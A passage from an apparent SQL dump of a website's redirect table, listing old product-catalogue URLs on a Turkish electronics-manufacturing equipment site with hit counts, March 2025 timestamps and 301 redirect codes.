00:00:00',301),(37577,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',21,0,'2025-03-01 14:10:33','0000-00-00 00:00:00',301),(37578,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',20,0,'2025-03-01 14:10:35','0000-00-00 00:00:00',301),(37579,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',21,0,'2025-03-01 14:10:37','0000-00-00 00:00:00',301),(37580,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',21,0,'2025-03-01 14:10:38','0000-00-00 00:00:00',301),(37581,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',1,0,'2025-03-01 14:10:40','0000-00-00 00:00:00',301),(37582,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',19,0,'2025-03-01 14:10:41','0000-00-00 00:00:00',301),(37583,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',21,0,'2025-03-01 14:10:42','0000-00-00 00:00:00',301),(37584,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın',NULL,'','',17,0,'2025-03-01 14:10:45','0000-00-00 00:00:00',301),(37585,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',16,0,'2025-03-01 14:10:46','0000-00-00 00:00:00',301),(37586,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',16,0,'2025-03-01 14:10:47','0000-00-00 00:00:00',301),(37587,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',16,0,'2025-03-01 14:10:50','0000-00-00 00:00:00',301),(37588,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',16,0,'2025-03-01 14:10:51','0000-00-00 00:00:00',301),(37589,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',18,0,'2025-03-01 14:10:52','0000-00-00 00:00:00',301),(37590,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-03-01 14:10:53','0000-00-00 00:00:00',301),(37591,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-03-01 14:10:54','0000-00-00 00:00:00',301),(37592,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2025-03-01 14:10:55','0000-00-00 00:00:00',301),(37593,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',19,0,'2025-03-01 14:10:56','0000-00-00 00:00:00',301),(37594,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',6,0,'2025-03-01 14:10:59','0000-00-00 00:00:00',301),(37595,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku',NULL,'','',21,0,'2025-03-01 23:15:31','0000-00-00 00:00:00',301),(37596,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',23,0,'2025-03-01 23:15:32','0000-00-00 00:00:00',301),(37597,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',16,0,'2025-03-01 23:15:36','0000-00-00 00:00:00',301),(37598,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',16,0,'2025-03-01 23:15:37','0000-00-00 00:00:00',301),(37599,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name',NULL,'','',14,0,'2025-03-01 23:15:40','0000-00-00 00:00:00',301),(37600,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',16,0,'2025-03-01 23:15:41','0000-00-00 00:00:00',301),(37601,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name',NULL,'','',17,0,'2025-03-01 23:15:43','0000-00-00 00:00:00',301),(37602,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',16,0,'2025-03-01 23:15:44','0000-00-00 00:00:00',301),(37603,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,ordering',NULL,'','',18,0,'2025-03-01 23:15:46','0000-00-00 00:00:00',301),(37604,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name',NULL,'','',17,0,'2025-03-01 23:15:49','0000-00-00 00:00:00',301),(37605,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',16,0,'2025-03-01 23:15:50','0000-00-00 00:00:00',301),(37606,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-03-01 23:15:52','0000-00-00 00:00:00',301),(37607,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/dirdesc',NULL,'','',12,0,'2025-03-01 23:15:53','0000-00-00 00:00:00',301),(37608,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',8,0,'2025-03-01 23:15:55','0000-00-00 00:00:00',301),(37609,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/ly-8c-detail',NULL,'','',10,0,'2025-03-01 23:15:56','0000-00-00 00:00:00',301),(37610,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',10,0,'2025-03-01 23:15:57','0000-00-00 00:00:00',301),(37611,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/am100-detail',NULL,'','',7,0,'2025-03-01 23:16:00','0000-00-00 00:00:00',301),(37612,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-03-01 23:16:01','0000-00-00 00:00:00',301),(37613,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name',NULL,'','',21,0,'2025-03-01 23:16:02','0000-00-00 00:00:00',301),(37614,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',16,0,'2025-03-01 23:16:03','0000-00-00 00:00:00',301),(37615,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name',NULL,'','',19,0,'2025-03-01 23:16:05','0000-00-00 00:00:00',301),(37616,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',18,0,'2025-03-01 23:16:06','0000-00-00 00:00:00',301),(37617,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-03-01 23:16:09','0000-00-00 00:00:00',301),(37618,'https://3s-technologies.com.tr/en/humans.txt',NULL,'https://3s-technologies.com.tr/humans.txt','',18,0,'2025-03-04 01:49:21','0000-00-00 00:00:00',301),(37619,'https://3s-technologies.com.tr/tr/config.yaml',NULL,'','',4,0,'2025-03-04 02:31:35','0000-00-00 00:00:00',301),(37620,'https://3s-technologies.com.tr/tr/config.yml',NULL,'','',8,0,'2025-03-04 02:31:38','0000-00-00 00:00:00',301),(37621,'https://3s-technologies.com.tr/tr/config.py',NULL,'','',3,0,'2025-03-04 02:31:43','0000-00-00 00:00:00',301),(37622,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-26-detail',NULL,'','',14,0,'2025-03-04 09:58:11','0000-00-00 00:00:00',301),(37623,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',24,0,'2025-03-04 09:58:12','0000-00-00 00:00:00',301),(37624,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',24,0,'2025-03-04 09:58:14','0000-00-00 00:00:00',301),(37625,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',19,0,'2025-03-04 09:58:15','0000-00-00 00:00:00',301),(37626,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',22,0,'2025-03-04 09:58:18','0000-00-00 00:00:00',301),(37627,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',24,0,'2025-03-04 09:58:20','0000-00-00 00:00:00',301),(37628,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',10,0,'2025-03-04 09:58:22','0000-00-00 00:00:00',301),(37629,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',18,0,'2025-03-04 09:58:23','0000-00-00 00:00:00',301),(37630,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',20,0,'2025-03-04 09:58:24','0000-00-00 00:00:00',301),(37631,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-03-04 09:58:25','0000-00-00 00:00:00',301),(37632,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2025-03-04 09:58:26','0000-00-00 00:00:00',301),(37633,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',19,0,'2025-03-04 09:58:27','0000-00-00 00:00:00',301),(37634,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',20,0,'2025-03-04 09:58:28','0000-00-00 00:00:00',301),(37635,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',18,0,'2025-03-04 09:58:31','0000-00-00 00:00:00',301),(37636,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',18,0,'2025-03-04 09:58:33','0000-00-00 00:00:00',301),(37637,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',18,0,'2025-03-04 09:58:34','0000-00-00 00:00:00',301),(37638,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',20,0,'2025-03-04 09:58:37','0000-00-00 00:00:00',301),(37639,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',21,0,'2025-03-04 09:58:39','0000-00-00 00:00:00',301),(37640,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın?language=en-gb',NULL,'','',1,0,'2025-03-04 09:58:41','0000-00-00 00:00:00',301),(37641,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',20,0,'2025-03-04 09:58:42','0000-00-00 00:00:00',301),(37642,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',24,0,'2025-03-04 09:58:43','0000-00-00 00:00:00',301),(37643,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',24,0,'2025-03-04 09:58:44','0000-00-00 00:00:00',301),(37644,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',21,0,'2025-03-04 09:58:47','0000-00-00 00:00:00',301),(37645,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',20,0,'2025-03-04 09:58:48','0000-00-00 00:00:00',301),(37646,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',16,0,'2025-03-04 09:58:51','0000-00-00 00:00:00',301),(37647,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',16,0,'2025-03-04 09:58:52','0000-00-00 00:00:00',301),(37648,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',18,0,'2025-03-04 09:58:55','0000-00-00 00:00:00',301),(37649,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',27,0,'2025-03-04 09:58:57','0000-00-00 00:00:00',301),(37650,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',26,0,'2025-03-04 09:58:58','0000-00-00 00:00:00',301),(37651,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',16,0,'2025-03-04 09:59:01','0000-00-00 00:00:00',301),(37652,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',15,0,'2025-03-04 09:59:03','0000-00-00 00:00:00',301),(37653,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',18,0,'2025-03-04 09:59:06','0000-00-00 00:00:00',301),(37654,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',17,0,'2025-03-04 09:59:07','0000-00-00 00:00:00',301),(37655,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',3,0,'2025-03-04 09:59:11','0000-00-00 00:00:00',301),(37656,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',20,0,'2025-03-04 09:59:12','0000-00-00 00:00:00',301),(37657,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',20,0,'2025-03-04 09:59:14','0000-00-00 00:00:00',301),(37658,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',19,0,'2025-03-04 09:59:17','0000-00-00 00:00:00',301),(37659,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',21,0,'2025-03-04 09:59:18','0000-00-00 00:00:00',301),(37660,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',20,0,'2025-03-04 09:59:19','0000-00-00 00:00:00',301),(37661,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',22,0,'2025-03-04 09:59:22','0000-00-00 00:00:00',301),(37662,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',22,0,'2025-03-04 09:59:23','0000-00-00 00:00:00',301),(37663,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',18,0,'2025-03-04 09:59:26','0000-00-00 00:00:00',301),(37664,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',17,0,'2025-03-04 09:59:27','0000-00-00 00:00:00',301),(37665,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',19,0,'2025-03-04 09:59:28','0000-00-00 00:00:00',301),(37666,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',17,0,'2025-03-04 09:59:30','0000-00-00 00:00:00',301),(37667,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',17,0,'2025-03-04 09:59:31','0000-00-00 00:00:00',301),(37668,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',18,0,'2025-03-04 09:59:34','0000-00-00 00:00:00',301),(37669,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',19,0,'2025-03-04 09:59:35','0000-00-00 00:00:00',301),(37670,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-03-04 09:59:48','0000-00-00 00:00:00',301),(37671,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',12,0,'2025-03-04 09:59:49','0000-00-00 00:00:00',301),(37672,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',13,0,'2025-03-04 09:59:51','0000-00-00 00:00:00',301),(37673,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',17,0,'2025-03-04 09:59:55','0000-00-00 00:00:00',301),(37674,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',18,0,'2025-03-04 09:59:57','0000-00-00 00:00:00',301),(37675,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',17,0,'2025-03-04 10:00:00','0000-00-00 00:00:00',301),(37676,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',18,0,'2025-03-04 10:00:02','0000-00-00 00:00:00',301),(37677,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name',NULL,'','',18,0,'2025-03-04 10:00:05','0000-00-00 00:00:00',301),(37678,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',18,0,'2025-03-04 10:00:06','0000-00-00 00:00:00',301),(37679,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',14,0,'2025-03-04 10:00:09','0000-00-00 00:00:00',301),(37680,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',17,0,'2025-03-04 10:00:10','0000-00-00 00:00:00',301),(37681,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_name?language=en-gb',NULL,'','',4,0,'2025-03-04 10:00:12','0000-00-00 00:00:00',301),(37682,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',22,0,'2025-03-04 10:00:13','0000-00-00 00:00:00',301),(37683,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',9,0,'2025-03-04 10:00:15','0000-00-00 00:00:00',301),(37684,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',16,0,'2025-03-04 10:00:16','0000-00-00 00:00:00',301),(37685,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_sku',NULL,'','',16,0,'2025-03-04 10:00:19','0000-00-00 00:00:00',301),(37686,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',9,0,'2025-03-04 10:00:20','0000-00-00 00:00:00',301),(37687,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-03-04 10:00:21','0000-00-00 00:00:00',301),(37688,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',16,0,'2025-03-04 10:00:22','0000-00-00 00:00:00',301),(37689,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',16,0,'2025-03-04 10:00:23','0000-00-00 00:00:00',301),(37690,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',24,0,'2025-03-04 10:00:25','0000-00-00 00:00:00',301),(37691,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',24,0,'2025-03-04 10:00:26','0000-00-00 00:00:00',301),(37692,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,ordering',NULL,'','',23,0,'2025-03-04 10:00:29','0000-00-00 00:00:00',301),(37693,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-03-04 10:00:31','0000-00-00 00:00:00',301),(37694,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-03-04 10:00:32','0000-00-00 00:00:00',301),(37695,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-03-04 10:00:33','0000-00-00 00:00:00',301),(37696,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku',NULL,'','',14,0,'2025-03-04 10:00:36','0000-00-00 00:00:00',301),(37697,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',16,0,'2025-03-04 10:00:37','0000-00-00 00:00:00',301),(37698,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name/dirdesc',NULL,'','',16,0,'2025-03-04 10:00:39','0000-00-00 00:00:00',301),(37699,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2025-03-04 10:00:40','0000-00-00 00:00:00',301),(37700,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-03-04 10:00:41','0000-00-00 00:00:00',301),(37701,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,ordering',NULL,'','',23,0,'2025-03-04 10:00:43','0000-00-00 00:00:00',301),(37702,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name',NULL,'','',23,0,'2025-03-04 10:00:45','0000-00-00 00:00:00',301),(37703,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',18,0,'2025-03-04 10:00:46','0000-00-00 00:00:00',301),(37704,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,ordering?language=tr-tr',NULL,'','',3,0,'2025-03-04 10:00:47','0000-00-00 00:00:00',301),(37705,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',23,0,'2025-03-04 10:00:48','0000-00-00 00:00:00',301),(37706,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name?language=tr-tr',NULL,'','',3,0,'2025-03-04 10:00:50','0000-00-00 00:00:00',301),(37707,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',18,0,'2025-03-04 10:00:52','0000-00-00 00:00:00',301),(37708,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-03-04 10:00:53','0000-00-00 00:00:00',301),(37709,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',16,0,'2025-03-04 10:00:54','0000-00-00 00:00:00',301),(37710,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,ordering',NULL,'','',15,0,'2025-03-04 10:00:58','0000-00-00 00:00:00',301),(37711,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name',NULL,'','',17,0,'2025-03-04 10:00:59','0000-00-00 00:00:00',301),(37712,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',16,0,'2025-03-04 10:01:00','0000-00-00 00:00:00',301),(37713,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-03-04 10:01:03','0000-00-00 00:00:00',301),(37714,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',18,0,'2025-03-04 12:09:30','0000-00-00 00:00:00',301),(37715,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',18,0,'2025-03-04 12:09:31','0000-00-00 00:00:00',301),(37716,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',18,0,'2025-03-04 12:09:34','0000-00-00 00:00:00',301),(37717,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',19,0,'2025-03-04 12:09:35','0000-00-00 00:00:00',301),(37718,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',18,0,'2025-03-04 12:09:38','0000-00-00 00:00:00',301),(37719,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',21,0,'2025-03-04 12:09:40','0000-00-00 00:00:00',301),(37720,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',22,0,'2025-03-04 12:09:41','0000-00-00 00:00:00',301),(37721,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',21,0,'2025-03-04 12:09:44','0000-00-00 00:00:00',301),(37722,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',10,0,'2025-03-04 12:09:48','0000-00-00 00:00:00',301),(37723,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',10,0,'2025-03-04 12:09:49','0000-00-00 00:00:00',301),(37724,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',11,0,'2025-03-04 12:09:50','0000-00-00 00:00:00',301),(37725,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',21,0,'2025-03-04 12:09:51','0000-00-00 00:00:00',301),(37726,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',15,0,'2025-03-04 12:09:54','0000-00-00 00:00:00',301),(37727,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',15,0,'2025-03-04 12:09:55','0000-00-00 00:00:00',301),(37728,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',16,0,'2025-03-04 12:09:58','0000-00-00 00:00:00',301),(37729,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',19,0,'2025-03-04 12:10:00','0000-00-00 00:00:00',301),(37730,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',19,0,'2025-03-04 12:10:01','0000-00-00 00:00:00',301),(37731,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',14,0,'2025-03-04 12:10:05','0000-00-00 00:00:00',301),(37732,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',17,0,'2025-03-04 12:10:08','0000-00-00 00:00:00',301),(37733,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/dirdesc',NULL,'','',15,0,'2025-03-04 12:10:09','0000-00-00 00:00:00',301),(37734,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',7,0,'2025-03-04 12:10:11','0000-00-00 00:00:00',301),(37735,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-03-04 12:10:12','0000-00-00 